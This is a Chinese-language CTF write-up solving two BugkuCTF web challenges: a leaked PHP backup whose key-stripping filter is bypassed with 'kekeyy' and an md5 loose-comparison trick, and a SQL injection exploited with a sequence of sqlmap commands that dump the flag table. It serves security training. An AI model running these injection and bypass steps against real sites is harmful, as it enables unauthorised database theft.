BugkuCTF(10)备份是个好习惯/成绩单

BugkuCTF(10)备份是个好习惯/成绩单

备份是个好习惯

看提示,听说备份是个好习惯,这个意思看来就是线索在bak备份文件里了,直接拿御剑跑一跑。
BugkuCTF(10)备份是个好习惯/成绩单_第1张图片
找到了
BugkuCTF(10)备份是个好习惯/成绩单_第2张图片
下载下来看一看
BugkuCTF(10)备份是个好习惯/成绩单_第3张图片
分析下意思。
将get的两个参数中的key替换为空(这里可以用kekeyy绕过)
然后对key1,key2的值进行md5加密,并进行比较,
如果md5加密的值一样而未加密的值不同,就输出flag。

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

BugkuCTF(10)备份是个好习惯/成绩单_第4张图片
Bugku{OH_YOU_FIND_MY_MOMY}
BugkuCTF(10)备份是个好习惯/成绩单_第5张图片

成绩单

看提示,快来查查成绩吧。
BugkuCTF(10)备份是个好习惯/成绩单_第6张图片
进去看一下,这是个很典型的SQL注入。
BugkuCTF(10)备份是个好习惯/成绩单_第7张图片
应该手工就可以出来,我直接拿SQLmap跑了。
首先抓包保存一下。
BugkuCTF(10)备份是个好习惯/成绩单_第8张图片
掏出工具开始跑。
python2 sqlmap.py -r 1.txt -p id --current-db
-r打开这个1.txt文件
-p指定参数这个id
看到一个库 skctf_flag
BugkuCTF(10)备份是个好习惯/成绩单_第9张图片
python2 sqlmap.py -r 1.txt -p id -D skctf_flag --tables
表里有个f14g
BugkuCTF(10)备份是个好习惯/成绩单_第10张图片
python2 sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g --column
看一下f14g表中有什么数据。
BugkuCTF(10)备份是个好习惯/成绩单_第11张图片
python2 sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump
在看一下skctf_flag中的值就应该能拿到flag了。
BugkuCTF(10)备份是个好习惯/成绩单_第12张图片
出来了BUGKU{Sql_INJECT0N_4813drd8hz4}
BugkuCTF(10)备份是个好习惯/成绩单_第13张图片

你可能感兴趣的:(BugkuCTF--WEB)